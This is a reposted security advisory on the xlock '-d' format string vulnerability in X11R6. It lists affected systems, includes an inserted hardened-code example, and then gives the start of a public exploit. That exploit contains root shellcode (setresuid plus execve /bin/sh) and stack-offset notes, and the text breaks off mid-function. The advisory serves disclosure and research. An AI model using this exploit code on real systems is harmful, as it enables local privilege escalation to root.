X11R6 xlock

2008-04-09 04:28:17 Source: Internet


X11R6 xlock "-d" parameter format string vulnerability

Published: 2000-08-18
Updated: 2000-10-26

Affected systems:

XFree86 X11R6 4.0.1
XFree86 X11R6 4.0
XFree86 X11R6 3.3.6
XFree86 X11R6 3.3.5
XFree86 X11R6 3.3.4
XFree86 X11R6 3.3.3
Open Group X 11.0R6.4
Open Group X 11.0R6.3
Open Group X 11.0R6.2
Open Group X 11.0R6.1
Open Group X 11.0R6

- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- Slackware Linux 7.1
- Slackware Linux 7.0
Unaffected systems:

Sun Solaris 8.0
Sun Solaris 7.0
Turbo Linux 6.0
Description:

The xlock program shipped in the X11R6 package contains a security vulnerability. Its "-d" parameter specifies which display should be locked.
The normal format is:
hostname:displaynumber, for example: a.b.com:0
However, if certain format strings are supplied as the "-d" parameter, an attacker can overwrite parts of the stack.
On some systems xlock is installed setuid root, so an attacker may be able to execute arbitrary code with root privileges.
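Added example (not from the advisory and not xlock's own code) showing the defensive side of the bug described above: the display name reaches fprintf only as a "%s" argument rather than as the format, and the "-d" value is validated against the hostname:displaynumber shape the advisory gives before it is used. The function names and the "xlock: bad display name:" message are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hardened error reporting: the format is a literal and the attacker-influenced
 * display name travels only as a "%s" argument, so "%n" or "%x" inside it is
 * printed literally instead of being interpreted (the advisory's bug is the
 * equivalent of fprintf(stderr, buf)). Returns the snprintf length. */
int format_display_error(char *out, size_t outlen, const char *display) {
    return snprintf(out, outlen, "xlock: bad display name: %s", display);
}

/* Input validation for the "-d" value: accept only [host]:display[.screen],
 * where host is letters, digits, '.' or '-' and display/screen are decimal.
 * Returns 1 if well formed, 0 otherwise. */
int valid_display_name(const char *d) {
    const char *colon = strchr(d, ':');
    const char *p;
    if (colon == NULL) return 0;                 /* "a.b.com" has no display */
    for (p = d; p < colon; p++)
        if (!isalnum((unsigned char)*p) && *p != '.' && *p != '-') return 0;
    p = colon + 1;
    if (!isdigit((unsigned char)*p)) return 0;   /* rejects "host:%n" */
    while (isdigit((unsigned char)*p)) p++;
    if (*p == '.') {                             /* optional screen number */
        p++;
        if (!isdigit((unsigned char)*p)) return 0;
        while (isdigit((unsigned char)*p)) p++;
    }
    return *p == '\0';                           /* nothing may follow */
}

/* Combined check: 0 = usable, -1 = rejected with a safely built message. */
int check_display_arg(const char *display, char *msg, size_t msglen) {
    if (valid_display_name(display)) { msg[0] = '\0'; return 0; }
    format_display_error(msg, msglen, display);
    return -1;
}

int main(int argc, char **argv) {
    char msg[256];
    const char *d = argc > 1 ? argv[1] : "a.b.com:0";  /* constructed default */
    if (check_display_arg(d, msg, sizeof msg) != 0) {
        fprintf(stderr, "%s\n", msg);
        return 1;
    }
    printf("display %s accepted\n", d);
    return 0;
}
```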

<* Source: bind (bind@subterrain.net) *>




Test method:

Warning

The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Users assume all risk!


Ben Williams provided the following test code:

/*

Exploit for xlock -d format string bug on i386 Linux.
By Ben Williams 21 Oct 2000.

Works on Slackware 7.1, Redhat 6.2 - did not have setuid though, Mandrake 7.0.
Redhat 6.1 won't work because fprintf segfaults on large precisions.

gcc xlockfmt.c -o xlockfmt
usage: xlockfmt [offset]
Default offset is 48.

Program calculates all variables such as target return address, shellcode address
and the format string itself. The only thing not calculated is an offset that is
dependent on the version of xlock or how xlock was compiled.
The target address is fprintf()'s saved return address. This equals the value of
openDisplay()'s saved base pointer less offset bytes. Shellcode is appended to
the format string.


Stack picture:
see resource.c, xlock.c

fprintf(stderr, buf)     A-48 | ret    |  return address located at A - 48 bytes.
                              | stderr |
                              | buf    |
error(buf)                    | bp   A |  first value printed by format string is A.
                              | ret    |
                              | buf    |
openDisplay(displayp)         | buf    |
                              | ?      |
                              | ?      |
                              | ?      |
                              | ?      |
                              | ?      |
                            A | bp     |  base pointer located at address A.


*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <error.h>
#include <errno.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * distance from fprintf's ret to openDisplay's base pointer
 * redhat6.2, slackware7.1 = 48
 * mandrake7.0 = 60
 */
#define OFFSET 48

#define XLOCK_PATH "/usr/X11R6/bin/xlock"

#define DEBUG 0
#define FMTSIZE 4096
#define CMDSIZE (FMTSIZE + 100)

/* number of words to print off the stack for analysis */
#define BIGBREAKFAST 400


/* xlock drops privs right away so we have to restore them again.
   setresuid(0, 0, 0) then execve a shell */
char shellcode[] =
    "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";


char *mkfmt(int prebuf, int breakfast,
            unsigned long int location, unsigned long int value);


int main(int argc, char **argv){
    FILE *fp;
    char output[65536];
    char fmtstr[FMTSIZE];
    char command[CMDSIZE];
    int i;
    char *p;
    int prebuf;
    int breakfast;
    unsigned long int location;
    unsigned long int value;
    int shellcode_size = sizeof shellcode;
    int offset = OFFSET;
    struct stat f;

    /* sanity checks on the target binary before doing anything else */
    i = stat(XLOCK_PATH, &f);
    if (i) error(1, errno, "whereis xlock?");
    if (!(f.st_mode & S_IXOTH)) error(1, 0, "executable?");
    if (!(f.st_mode & S_ISUID)) error(1, 0, "not setuid");

    if (argc > 1) {
        offset = atoi(argv[1]);
    }

    /*
     * Setup a format string to analyse the stack.
     */

    memset(output, 0, 65536);
